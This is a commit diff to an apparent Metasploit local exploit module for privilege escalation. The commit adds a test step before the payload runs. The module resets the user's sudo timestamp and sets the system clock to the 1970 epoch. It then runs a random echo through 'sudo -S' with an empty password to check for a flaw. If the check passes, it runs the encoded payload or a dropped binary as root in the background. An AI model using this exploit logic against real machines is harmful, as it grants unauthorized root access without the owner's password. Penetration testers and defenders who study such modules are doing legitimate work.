Make a test before running the payload
jvazquez-r7
parent
ab293d2ad9
commit
3ce23ffb49
|
|
@ -160,14 +160,6 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
private
|
||||
|
||||
def run_sudo_cmd
|
||||
sudo_cmd_raw = if using_native_target?
|
||||
['sudo', '-S', [drop_path].shelljoin].join(' ')
|
||||
elsif using_cmd_target?
|
||||
['sudo', '-S', '/bin/sh', '-c', [payload.encoded].shelljoin].join(' ')
|
||||
end
|
||||
|
||||
## to prevent the password prompt from destroying session
|
||||
sudo_cmd = 'echo "" | ' + sudo_cmd_raw + ' & true'
|
||||
|
||||
print_status("Resetting user's time stamp file and setting clock to the epoch")
|
||||
cmd_exec(
|
||||
|
|
@ -176,14 +168,37 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
" -setdate 01:01:1970 -settime 00:00"
|
||||
)
|
||||
|
||||
# Run Test
|
||||
test = rand_text_alpha(4 + rand(4))
|
||||
sudo_cmd_test = ['sudo', '-S', ["echo #{test}"].shelljoin].join(' ')
|
||||
|
||||
print_status("Executing test...")
|
||||
output = cmd_exec('echo "" | ' + sudo_cmd_test)
|
||||
|
||||
if output =~ /incorrect password attempts\s*$/i
|
||||
fail_with(Exploit::Failure::NotFound, "User has never run sudo, and is therefore not vulnerable. Bailing.")
|
||||
elsif output =~ /#{test}/
|
||||
print_good("Test executed succesfully. Running payload.")
|
||||
else
|
||||
print_error("Unknown fail while testing, trying to execute the payload anyway...")
|
||||
end
|
||||
|
||||
|
||||
# Run Payload
|
||||
sudo_cmd_raw = if using_native_target?
|
||||
['sudo', '-S', [drop_path].shelljoin].join(' ')
|
||||
elsif using_cmd_target?
|
||||
['sudo', '-S', '/bin/sh', '-c', [payload.encoded].shelljoin].join(' ')
|
||||
end
|
||||
|
||||
## to prevent the password prompt from destroying session
|
||||
## backgrounding the sudo payload in order to keep both sessions usable
|
||||
sudo_cmd = 'echo "" | ' + sudo_cmd_raw + ' & true'
|
||||
|
||||
print_status "Running command: "
|
||||
print_line sudo_cmd
|
||||
output = cmd_exec(sudo_cmd)
|
||||
if output =~ /incorrect password attempts\s*$/i
|
||||
fail_with(Exploit::Failure::NotFound,
|
||||
"User has never run sudo, and is therefore not vulnerable. Bailing.")
|
||||
end
|
||||
#print_good output
|
||||
|
||||
end
|
||||
|
||||
# cmd_exec doesn't allow to get a session, so there is no way to make the cleanup
|
||||
|
|
|
|||
Loading…
Reference in New Issue